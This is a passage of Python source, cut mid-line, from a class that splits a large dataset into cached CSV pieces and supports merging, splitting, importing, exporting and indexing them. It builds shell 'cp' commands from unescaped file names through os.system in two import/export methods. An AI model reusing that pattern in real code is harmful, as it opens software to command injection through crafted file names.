dc(df)\n if self.seq_inv_trans_method is not None:\n assert self.seq_trans_method is not None\n df2[self.seq_col] = df2[self.seq_col].apply(lambda x: self.seq_inv_trans_method(x)) \n \n df2.to_csv(fullname, index=False)\n del df2; df2 = None\n \n elif type_ == self.__class__.__name__:\n \n fefs = df\n fefs.take_actions(max_level=4) #??? or max_level=3?\n fullname += '.' + self.__class__.extension\n fefs.write(fullname) # by calling write, this tsfefs object will have its path and name reset.\n \n else:\n print(\"Type\", type_, \"not supported\")\n assert False\n return\n\n\n\n\n\n\n\n \n \n\n ##################################################################################################################\n ################################################# Cache Ops: BEG #################################################\n \n \"\"\"\n Called by:\n - __getitem__using_idx\n - __getitem__using_indices\n - __setitem__using_idx\n - __setitem__using_indices\n - __delitem__using_idx\n - __delitem__using_indices\n \"\"\"\n def renew_idx(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n if idx in self.cache:\n self.cache.remove(idx)\n self.cache.append(idx)\n\n \"\"\"\n Called by:\n - __action_delete\n \"\"\"\n def remove_idx(self, idx): \n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n if idx in self.cache:\n self.cache.remove(idx)\n self.cache = [ idx_ - 1 if idx_ > idx else idx_ for idx_ in self.cache ]\n\n \n\n \"\"\"\n Called by:\n - __action_split\n \"\"\"\n def split_idx(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n \"\"\"\n - idx: the originally index, which will be retained, with new pieces created from it.\n - new_idx: split will lengthen the array, len(self.pieces)-1\n \n The new idx will be inserted in the cache behind the idx.\n \"\"\"\n new_idx = len(self.pieces)-1\n \n \n \"\"\"\n If idx not in cache, new_idx, which is split from idx, should not be in cache as well.\n \"\"\"\n if idx in self.cache:\n loc = self.cache.index(idx)\n if new_idx in self.cache:\n self.cache.remove(new_idx)\n self.cache.insert(loc,new_idx)\n else:\n if new_idx in self.cache:\n self.cache.remove(new_idx)\n # if idx not in cache, no need to have new_idx in cache.\n\n\n\n \"\"\"\n Called by:\n - __action_merge\n \"\"\"\n def merge_idx(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n tobemerged_idx = self.action_params[idx]\n assert isinstance(tobemerged_idx,int)\n \n if tobemerged_idx in self.cache:\n loc2 = self.cache.index(tobemerged_idx)\n if idx in self.cache:\n loc1 = self.cache.index(idx)\n if loc2 > loc1:\n self.cache.remove(idx)\n self.cache.insert(loc2,idx)\n else:\n self.cache.insert(loc2,idx)\n \n \"\"\"\n Called by:\n - __add_fefs\n - __add_df\n \"\"\"\n def include_idx(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n \"\"\"\n only include idx to the lower priority.\n Note: 0 is the lowest priority.\n \"\"\"\n if idx not in self.cache:\n self.cache.insert(0,idx)\n\n\n\n def __set_piece_to_none(self,idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n df = self.dfs[idx]\n if df is None:\n return\n type_ = self.types[idx]\n if type_ == \"csv\":\n pass\n elif type_ == self.__class__.__name__:\n # elif type_ == \"tsfefs\":\n for idx2 in range(len(df.pieces)):\n df.__set_piece_to_none(idx2)\n else:\n assert False \n \n del df\n df = None\n self.dfs[idx] = None\n return\n\n\n def __count_opened_rows(self,idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n df = self.dfs[idx]\n type_ = self.types[idx]\n if df is None:\n return 0\n if type_ == \"csv\":\n return self.row_cnts[idx]\n elif type_ == self.__class__.__name__:\n # elif type_ == \"tsfefs\":\n fefs = df\n row_cnt = 0\n for idx_ in range(len(fefs.pieces)):\n row_cnt += fefs.__count_opened_rows(idx_)\n return row_cnt\n else:\n assert False\n \n\n def __maintain_cache_by_rows(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n cache_config = self.cache_config\n rows_in_cache = cache_config[\"rows_in_cache\"]\n \n cache = []\n for i in reversed(range(len(self.cache))):\n idx = self.cache[i]\n row_cnt = self.__count_opened_rows(idx)\n if rows_in_cache >= row_cnt:\n rows_in_cache -= row_cnt\n cache.append(idx)\n continue\n break\n \n cache = list(reversed(cache))\n clear_indices = set(self.cache) - set(cache)\n for idx in clear_indices:\n self.__set_piece_to_none(idx)\n self.cache = cache\n return\n \n\n\n \n def __maintain_cache_by_len(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n cache_config = self.cache_config\n len_of_cache = cache_config[\"len_of_cache\"]\n if len(self.cache) <= len_of_cache:\n return\n \n self.cache = self.cache[-len_of_cache:]\n for idx in range(len(self.pieces)):\n if idx in self.cache:\n continue\n self.__set_piece_to_none(idx)\n \n \n \n \n \n def maintain_cache(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n # action_levels = [ BaseFEFS.action_domain.index(act) for act in self.actions ]\n # assert np.all(np.array(action_levels) == BaseFEFS.action_domain.index(\"\"))\n assert not self.has_pending_actions()\n \n\n self.__check_cache_config()\n cache_config = self.cache_config\n rows_in_cache = cache_config[\"rows_in_cache\"]\n len_of_cache = cache_config[\"len_of_cache\"]\n \n if rows_in_cache is not None:\n self.__maintain_cache_by_rows()\n elif len_of_cache is not None:\n self.__maintain_cache_by_len()\n else:\n assert False\n return\n\n ################################################# Cache Ops: END #################################################\n ##################################################################################################################\n \n \n \n \n\n\n #########################################################################################################\n ############################################## Action: BEG ##############################################\n \n def __action_nothing(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n return\n\n \n def __action_update(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n\n df = self.dfs[idx]\n assert df is not None\n \n type_ = self.types[idx]\n len_ = None\n if type_ == \"csv\":\n len_ = len(df)\n elif type_ == self.__class__.__name__:\n fefs = df\n len_ = fefs.row_cnt\n else:\n print(\"Type\", type_, \"not supported\")\n assert False\n\n fr, to = None, None\n if len_ > 0:\n if type_ == \"csv\":\n S_ = df[self.seq_col]\n elif type_ == self.__class__.__name__:\n S_ = df.__get_seqs()\n else:\n print(\"Type\", type_, \"not supported\")\n assert False\n fr, to = min(S_), max(S_)\n\n self.frs[idx], self.tos[idx] = fr, to\n self.row_cnts[idx] = len_\n frs = [ fr for fr in self.frs if fr is not None ]\n tos = [ to for to in self.tos if to is not None ]\n self.fr, self.to = min(frs), max(tos)\n row_cnts = [ rcnt for rcnt in self.row_cnts if rcnt is not None ]\n self.row_cnt = sum(row_cnts)\n self.actions[idx] = \"save\" # it will be saved later\n \n self.vprint(self.pieces[idx], \"turned to status \\\"save\\\"\")\n \n if len_ == 0:\n self.actions[idx] = \"delete\"\n \n self.vprint(self.pieces[idx], \"turned to status \\\"delete\\\" because its len is 0\")\n \n return\n \n\n def __action_save(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n\n self.__write_piece(idx)\n self.actions[idx] = \"\"\n return\n\n\n def __action_delete(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n\n\n df = self.dfs[idx]\n assert df is not None\n\n type_ = self.types[idx]\n piece = self.pieces[idx]\n fullname = self.__compose_piece_fullname(piece)\n if type_ == \"csv\":\n if os.path.isfile(fullname):\n os.remove(fullname)\n elif type_ == self.__class__.__name__:\n fefs = df\n fefs.remove()\n \n else:\n print(\"Type\", type_, \"not supported\")\n assert False\n\n del self.pieces[idx]\n del self.types[idx]\n del self.frs[idx]; del self.tos[idx]\n del self.row_cnts[idx]\n del self.actions[idx]; del self.action_params[idx]\n del self.dfs[idx]\n del df; df = None\n \n self.remove_idx(idx)\n\n frs = [ fr for fr in self.frs if fr is not None ]\n tos = [ to for to in self.tos if to is not None ]\n if len(frs) > 0:\n assert len(tos) > 0\n self.fr, self.to = min(frs), max(tos)\n else:\n self.fr, self.to = None, None\n \n self.row_cnt = sum(self.row_cnts)\n return\n\n\n def __action_split(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n\n df = self.dfs[idx]\n assert df is not None\n \n type_ = self.types[idx]\n \n \"\"\"\n The design is not advanced enough to be able to split 1 TSFEFS into 2 TSFEFSs,\n so let's have all the splits be csvs.\n \"\"\"\n if type_ == self.__class__.__name__:\n df = df.export_dataframe()\n df = df.sort_values(by=self.seq_col).reset_index(drop=True)\n\n n = len(df)\n num_rows_per_file = int(self.max_row_per_piece/2)\n num_of_files = int(np.ceil(n/num_rows_per_file))\n\n dfs = [ df.iloc[(i*num_rows_per_file):((i+1)*num_rows_per_file)] for i in range(num_of_files) ]\n\n if len(dfs) == 0:\n assert False\n elif len(dfs) == 1:\n \"\"\"\n no need for split action\n \"\"\"\n return\n else:\n self.types[idx] = \"csv\"\n type_ = \"csv\"\n self.dfs[idx] = df\n\n \n df = dfs[0]\n self.dfs[idx] = df\n \"\"\" can leave fr and to updates when \"update\" \"\"\"\n self.actions[idx] = \"update\"\n\n dfs = dfs[1:]\n\n if type_ == \"csv\":\n for df in dfs:\n \"\"\"\n instead of using \n self += df\n the following codes are preferred.\n \n Calling __add__ will let the new_idx to be included in cache,\n which will mess up the split_idx logic.\n \"\"\"\n piece = self.gen_valid_piece(prefix=\"\", suffix=\"\")\n self.pieces += [piece]\n self.types += [type_]\n self.frs += [None] # leave to \"update\" action\n self.tos += [None] # leave to \"update\" action\n self.row_cnts += [None]\n self.actions += [\"update\"]\n self.action_params += [None]\n self.dfs += [df]\n \n self.split_idx(idx) # this will the new indices next to the location of idx in cache\n\n else: # elif self.types[idx] == \"fefs\"\n print(\"File type\", type_, \"not yet implemented\")\n assert False\n return\n\n\n def __action_merge(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n df = self.dfs[idx]\n \n \"\"\"\n I might have reasons for this line,\n but seems like it is now causing trouble.\n Let's recall the reason?\n \"\"\"\n # assert df is not None\n \"\"\"\n Temporarily replace the above line by this\n \"\"\"\n if df is None:\n df = self.__read_piece(idx)\n self.dfs[idx] = df\n \n \n \n idx_tobemerged = self.action_params[idx]\n assert isinstance(idx_tobemerged,int)\n df_tobemerged = self.dfs[idx_tobemerged]\n \n \n \n \"\"\"\n I might have reasons for this line,\n but seems like it is now causing trouble.\n Let's recall the reason?\n \"\"\"\n # assert df_tobemerged is not None\n \"\"\"\n Temporarily replace the above line by this\n \"\"\"\n if df_tobemerged is None:\n df_tobemerged = self.__read_piece(idx_tobemerged)\n self.dfs[idx_tobemerged] = df_tobemerged\n\n \n \n \n \n type_ = self.types[idx]\n type_tobemerged = self.types[idx_tobemerged]\n if type_ == \"csv\" and type_tobemerged == \"csv\":\n df = pd.concat([df,df_tobemerged]).reset_index(drop=True)\n elif type_ == \"csv\" and type_tobemerged == self.__class__.__name__:\n df_tobemerged = df_tobemerged.export_dataframe()\n df = pd.concat([df,df_tobemerged]).reset_index(drop=True)\n elif type_ == self.__class__.__name__ and type_tobemerged == \"csv\":\n df += df_tobemerged\n elif type_ == \"tsfefs\" and type_tobemerged == self.__class__.__name__:\n df += df_tobemerged \n else:\n print(\"Type\", type_tobemerged, \"not supported.\")\n assert False\n \n \n self.merge_idx(idx) # has to be run before action_params[idx] is set to None\n \n \n self.dfs[idx] = df\n self.action_params[idx] = None\n self.actions[idx] = \"update\"\n \n self.frs[idx_tobemerged] = None\n self.tos[idx_tobemerged] = None\n self.row_cnts[idx_tobemerged] = None\n self.actions[idx_tobemerged] = \"delete\"\n self.action_params[idx_tobemerged] = None \n return\n\n\n def __sanity_check(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n n = len(self.pieces)\n listoflists = [ self.types, self.frs, self.tos, self.row_cnts, \n self.actions, self.action_params, self.dfs ]\n assert all([ n == len(l) for l in listoflists ])\n return\n \n \n def __map_action_to_func(self,level):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n if level == 0:\n return self.__action_update\n elif level == 1:\n return self.__action_split\n elif level == 2:\n return self.__action_merge\n elif level == 3:\n return self.__action_save\n elif level == 4:\n return self.__action_delete\n elif level == 5:\n return self.__action_nothing\n else:\n print(\"No such action with level %i\"%level)\n assert False \n\n \n\n\n def take_actions(self, max_level=0):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n \"\"\"\n Never set max_level = 5, infinite loop.\n \"\"\"\n # Levels: 0) \"update\", 1) \"split\", 2) \"merge\", 3) \"save\", 4) \"delete\", 5) \"\".\n current_level = 0\n while current_level <= max_level:\n self.vprint(\"current_level:\", current_level)\n \n action_levels = [ self.__class__.action_domain.index(act) for act in self.actions ]\n \n action_indices = [ idx for idx in reversed(range(len(action_levels))) if action_levels[idx] == current_level ]\n if len(action_indices) == 0:\n current_level += 1\n else: # len(action_indices) > 0:\n for idx in action_indices:\n self.__map_action_to_func(current_level)(idx)\n current_level = 0\n return\n\n\n def has_pending_actions(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n # b = any(np.array(action_levels) != BaseFEFS.action_domain.index(\"\"))\n action_levels = [ self.__class__.action_domain.index(act) for act in self.actions ]\n b = any(np.array(action_levels) != self.__class__.action_domain.index(\"\"))\n \n return b\n\n ############################################## Action: END ##############################################\n #########################################################################################################\n\n \n \n \n \n \n \n \n \n \n \n \n ################################################################################################################\n ############################################## Import,Export: BEG ##############################################\n\n\n def __no_overlapping_seq_range(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n \"\"\"\n ensure fr1 < to1 < fr2 < to2 < ...\n \"\"\"\n df = pd.DataFrame({\"fr\":self.frs,\"to\":self.tos})\n df = df.sort_values(by=[\"fr\",\"to\"])\n \n # print(\"##################\")\n # print(\"1.\")\n # print(\"df\")\n # print(df)\n # print(\"##################\")\n # print()\n \n orders = list(df.index)\n arr = np.array(df)\n \n # print(\"##################\")\n # print(\"2.\")\n # print(\"arr\")\n # print(arr)\n # print(\"##################\")\n # print()\n \n arr = arr.reshape(-1).tolist() # becomes [fr1,to1,fr2,to2,...]\n \n # print(\"##################\")\n # print(\"3.\")\n # print(\"arr\")\n # print(arr)\n # print(\"##################\")\n # print()\n \n # print(\"##################\")\n # print(\"4.\")\n # df2 = dc(df)\n # df2[\"fr\"] = df2[\"fr\"].apply(lambda x: str(x))\n # df2[\"to\"] = df2[\"to\"].apply(lambda x: str(x))\n # arr2 = np.array(df2)\n # arr2 = arr2.reshape(-1).tolist()\n # print(\"arr2\")\n # print(arr2)\n # print(\"##################\")\n # print()\n\n assert all([ arr[i+1] >= arr[i] for i in range(len(arr)-1) ])\n return orders\n \n\n \n \"\"\"\n Export all as a single df\n \"\"\"\n def export_dataframe(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n orders = self.__no_overlapping_seq_range()\n \n dfs = []\n \n # rearrange all the lists according to orders\n for idx in orders:\n \n df = self.dfs[idx]\n if df is None:\n df = self.__read_piece(idx)\n\n type_ = self.types[idx]\n if type_ == \"csv\":\n dfs.append(df)\n elif type_ == self.__class__.__name__:\n dfs.append(df.export_dataframe())\n else:\n print(\"Type\", type_, \"not supported\")\n assert False\n\n if len(dfs) == 0:\n return pd.DataFrame()\n \n df = pd.concat(dfs).reset_index(drop=True)\n return df\n\n \n \n def export_dstfile(self, dstfile):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n df = self.export_dataframe()\n if self.seq_inv_trans_method is not None:\n assert self.seq_trans_method is not None\n df[self.seq_col] = df[self.seq_col].apply(lambda x: self.seq_inv_trans_method(x))\n df.to_csv(dstfile,index=False)\n return\n\n \n \n def export_dstfolder(self, dstfolder):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n \"\"\"\n Don't allow if any of those frs and tos are None,\n otherwise can't name the dst files.\n \"\"\"\n assert self.has_valid_status() # no None in the lists\n\n \"\"\"\n Don't allow if there is pending actions, \n otherwise can't copy from src to dst.\n \"\"\"\n assert not self.has_pending_actions()\n \n\n if not os.path.isdir(dstfolder):\n os.mkdir(dstfolder)\n \n \"\"\"\n The export format is e.g., \"3. 2020-01-10 03:05:11 ~ 2020-01-10 03:05:11.csv\"\n \"\"\"\n fullpath = self.__compose_fullpath()\n for idx in range(len(self.pieces)):\n \n piece = self.pieces[idx]\n fr, to = self.frs[idx], self.tos[idx]\n \n if self.seq_inv_trans_method is not None:\n assert self.seq_trans_method is not None\n fr = self.seq_inv_trans_method(fr)\n to = self.seq_inv_trans_method(to)\n \n src = \"%s/%s\"%(fullpath,piece) \n \n f = \"%i. %s ~ %s.csv\"%(idx,fr,to)\n dst = \"%s/%s\"%(dstfolder,f)\n os.system(\"cp \\\"%s\\\" \\\"%s\\\"\"%(src,dst))\n \n # print(\"From %s to %s\"%(src,dst))\n \n return\n\n \n\n def import_dataframe(self, df):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n self.pieces = []\n self.types = []\n self.frs = []\n self.tos = []\n self.row_cnts = []\n \n self.actions = []\n self.action_params = []\n self.dfs = []\n \n self.cache = []\n \n df = df.sort_values(by=self.seq_col).reset_index(drop=True)\n self += df\n self.__action_split(0)\n return\n\n\n\n def import_srcfile(self, srcfile):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n if self.seq_read_dtype is None:\n df = pd.read_csv(srcfile)\n else:\n df = pd.read_csv(srcfile, dtype={self.seq_col:self.seq_read_dtype})\n\n assert self.seq_col in df.columns\n if self.seq_trans_method is not None:\n assert self.seq_inv_trans_method is not None\n df[self.seq_col] = df[self.seq_col].apply(lambda x: self.seq_trans_method(x))\n self.import_dataframe(df)\n return\n\n\n\n def import_srcfolder(self, srcfolder):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n \"\"\"\n List of files to be copied\n \"\"\"\n files = os.listdir(srcfolder)\n if srcfolder[-1] == '/':\n srcfolder = srcfolder[:-1]\n files = [ \"%s/%s\"%(srcfolder,f) for f in files ]\n files = [ f for f in files if not os.path.isdir(f) ]\n \n \n \"\"\"\n starts from nothing\n \"\"\"\n self.pieces = []\n self.types = []\n self.frs = []\n self.tos = []\n self.row_cnts = []\n\n self.actions = []\n self.action_params = []\n self.dfs = []\n \n self.cache = []\n\n \n fullpath = self.__compose_fullpath()\n if not os.path.isdir(fullpath):\n os.mkdir(fullpath)\n\n \n \"\"\"\n 1. copy files to fullpath\n 2. initialize the lists\n 3. do everything as if done in __action_update but not calling __action_update\n \"\"\"\n for idx,f in enumerate(files):\n src = f\n piece = self.gen_valid_piece(prefix=\"\", suffix=\"\")\n dst = \"%s/%s\"%(fullpath,piece)\n # print(\"Command:\", \"cp \\\"%s\\\" \\\"%s\\\"\"%(src,dst))\n os.system(\"cp \\\"%s\\\" \\\"%s\\\"\"%(src,dst))\n \n self.pieces += [piece]\n self.types += [\"csv\"]\n \n # dfs[idx] has to exist before calling __get_time(idx)\n self.dfs += [None]\n S = self.__get_seq(idx)\n \n self.frs += [min(S)]\n self.tos += [max(S)]\n self.row_cnts += [len(S)]\n\n self.actions += [\"\"] # the above info are filled, to avoid calling __action_update\n self.action_params += [None]\n \n self.fr = min(self.frs)\n self.to = max(self.tos)\n self.row_cnt = sum(self.row_cnts)\n return\n\n\n \n def all_pieces_as_csv(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n dfs = []\n for idx in range(len(self.pieces)):\n type_ = self.types[idx]\n if type_ == \"csv\":\n continue\n elif type_ == self.__class__.__name__:\n # elif type_ == \"tsfefs\":\n df = self.dfs[idx].export_dataframe()\n dfs += [df]\n self.actions[idx] = \"delete\"\n else:\n print(\"Type\", type_, \"not supported\")\n assert False\n self.take_actions(max_level=4)\n\n for df in dfs:\n self += df\n self.actions[len(self.actions)-1] = \"split\"\n self.take_actions(max_level=2)\n return\n ############################################## Import,Export: END ##############################################\n ################################################################################################################\n\n \n\n \n\n \n ###################################################################################################################\n ############################################# Overriding __len__: BEG #############################################\n def __len__(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n return self.row_cnt\n ############################################# Overriding __len__: END #############################################\n ###################################################################################################################\n \n \n\n \n \n \n \n ####################################################################################################################\n ##################################### Overriding Square Bracket - general: BEG #####################################\n def __idx_check(self,idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n assert isinstance(idx,int_types)\n \n while idx < 0:\n idx += len(self)\n \n if idx > len(self) - 1:\n print(\"Index out of range\")\n assert False\n \n return idx\n\n\n\n def __indices_check(self,indices):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n \n assert isinstance(indices,list)\n assert all([ isinstance(idx,int_types) for idx in indices ])\n assert len(indices) <= len(self)\n \n for i in range(len(indices)):\n idx = indices[i]\n while idx < 0:\n idx += len(self)\n indices[i] = idx\n \n if len(indices) > len(set(indices)):\n print(\"Dupicated indices\")\n assert False\n \n assert all([ idx < len(self) for idx in indices ])\n return indices\n \n \n def __str_check(self,colname):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n assert isinstance(colname,str_types)\n \n if colname not in self.colnames:\n print(\"No such column name as %s, try update action\"%colname)\n assert False\n return\n \n\n def __strs_check(self,colnames):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n assert isinstance(colnames,list)\n assert all([ isinstance(s,str_types) for s in colnames ])\n \n if len(set(colnames) - set(self.colnames)) > 0:\n print(\"Some requested column names don't exits.\")\n print(\"You may consider the \\\"update\\\" action.\")\n assert False\n return\n\n\n def __bools_check(self,B):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n assert isinstance(B,list)\n assert all([ isinstance(b,bool_types) for b in B ])\n assert len(B) == len(self) # has to be equal length\n return\n\n \n # Only for __setitems__'s strs and indices (and thus bools).\n def __value_check(self, value, assignment_w, assignment_h):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n\n \"\"\"\n Only for __setitems__'s strs and indices (and bools).\n Return 2D or 1D array, \n in which the array by accessing arr[idx:(idx+n)] they will return the corresponding rows for assignments.\n \"\"\"\n # check value\n if isinstance(value,(arr_types,pd.DataFrame)):\n value = np.array(value)\n if len(value.shape) == 1:\n if value.shape[0] == 1: # this is value = [x]\n value = value[0] # will be turned to list \n else:\n assert value.shape[0] == assignment_w\n elif len(value.shape) == 2:\n assert (value.shape[1] == assignment_w) or (value.shape[1] == 1)\n assert (value.shape[0] == assignment_h) or (value.shape[0] == 1) \n else: # at most 2 dimensional array, of course\n print(\"Dimension of the assignment:\", value.shape)\n assert False\n elif isinstance(value,range):\n print(type(value), \"type can only be assigned to pd.Series\")\n assert False\n \n if not isinstance(value,(arr_types,pd.DataFrame)):\n value = [value]*assignment_h # turn singular to list \n\n return value\n\n ##################################### Overriding Square Bracket - general: END #####################################\n ####################################################################################################################\n \n\n\n\n \n\n ####################################################################################################################\n ##################################### Overriding Square Bracket - getitem: BEG #####################################\n \n def __get_piece_idx(self, idx, orders):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n accum_row_cnt = 0\n _order = None\n for _ord in orders:\n row_cnt = self.row_cnts[_ord]\n if idx > row_cnt - 1:\n idx -= row_cnt\n accum_row_cnt += row_cnt\n continue\n _order = _ord\n break\n \n return (_order, accum_row_cnt)\n\n \n\n def __getitem__using_idx(self,idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n idx = self.__idx_check(idx) \n orders = self.__no_overlapping_seq_range()\n _order, accum_row_cnt = self.__get_piece_idx(idx, orders)\n \n df = self.dfs[_order]\n if df is None:\n df = self.__read_piece(_order)\n self.dfs[_order] = df\n\n idx -= accum_row_cnt\n type_ = self.types[_order]\n if type_ == \"csv\":\n self.renew_idx(_order)\n return df.iloc[idx]\n \n elif type_ == self.__class__.__name__:\n # elif type_ == \"tsfefs\":\n fefs = df\n self.renew_idx(_order)\n return fefs[idx]\n \n else:\n print(\"Type\", type_, \"not supported\")\n assert False\n \n print(\"Error! Find it out!\")\n assert False\n \n \n \n def __getitem__using_str(self,colname):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n self.__str_check(colname)\n \n values = []\n orders = self.__no_overlapping_seq_range()\n for _order in orders:\n df = self.dfs[_order]\n if df is None:\n df = self.__read_piece(_order)\n self.dfs[_order] = df\n values.extend(df[colname])\n S = pd.Series(values)\n S.name = colname\n return S\n\n\n def __get_indices_in_same_piece(self, indices, orders):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n idx = indices[0]\n _order, accum_row_cnt = self.__get_piece_idx(idx, orders) \n if _order is None:\n assert False\n \n idx_beg = accum_row_cnt\n idx_end = accum_row_cnt + self.row_cnts[_order]\n idx_range = range(idx_beg,idx_end)\n \n adjusted_indices = []\n for idx in indices:\n if idx in idx_range:\n adjusted_indices.append(idx-accum_row_cnt)\n continue\n break\n \n return (_order, adjusted_indices)\n \n \n \n def __getitem__using_indices(self,indices):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n indices = self.__indices_check(indices)\n indices_copied = dc(indices)\n\n dfs = []\n orders = self.__no_overlapping_seq_range()\n \n while len(indices) > 0:\n _order, adjusted_indices = self.__get_indices_in_same_piece(indices, orders)\n df = self.dfs[_order]\n if df is None:\n df = self.__read_piece(_order)\n\n type_ = self.types[_order] \n if type_ == \"csv\":\n df_ = df.iloc[adjusted_indices]\n \n self.renew_idx(_order)\n\n elif type_ == self.__class__.__name__:\n fefs = df\n df_ = fefs[adjusted_indices]\n self.renew_idx(_order)\n \n else:\n print(\"Type\", type_, \"not supported\")\n assert False\n \n dfs.append(df_)\n indices = indices[len(adjusted_indices):]\n \n\n if len(dfs) == 0:\n return pd.DataFrame()\n \n df = pd.concat(dfs).reset_index(drop=True)\n df.index = indices_copied\n return df\n \n\n\n def __getitem__using_bools(self,B):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n self.__bools_check(B)\n \n indices = np.array(range(len(B)))[B].tolist()\n return self.__getitem__using_indices(indices)\n\n \n def __getitem__using_strs(self,colnames):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n self.__strs_check(colnames)\n \n dfs = []\n indices = []\n cum_row_cnt = 0\n orders = self.__no_overlapping_seq_range()\n for _order in orders:\n df = self.dfs[_order]\n if df is None:\n df = self.__read_piece(_order)\n self.dfs[_order] = df\n dfs.append(df[colnames])\n indices += list(np.array(self.__class__.get_index(df)) + cum_row_cnt)\n cum_row_cnt += self.row_cnts[_order]\n \n if len(dfs) == 0:\n return pd.DataFrame()\n \n df = pd.concat(dfs).reset_index(drop=True)\n df.index = indices\n return df\n \n \n def __getitem__(self, key):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n \"\"\"\n Accetpable queries:\n Single:\n - int: fefs[33]\n - str: fefs[\"age\"]\n Multiple:\n - slice of ints: fefs[20:], fefs[20:50], fefs[::2], ...\n - list of ints: fefs[[1,2,5,10]]\n - list of strs: fefs[[\"time\",\"purchased\",\"item\",\"price\"]]\n - list of bools: fefs[[True,False,True,...]] # must have length == row_cnt\n \"\"\" \n if isinstance(key,str_types):\n return self.__getitem__using_str(key)\n elif isinstance(key,int_types):\n return self.__getitem__using_idx(key)\n elif isinstance(key,(arr_types,slice)):\n if isinstance(key,np.ndarray):\n assert len(key.shape) == 1 # must be in (n,)\n key = list(key)\n elif 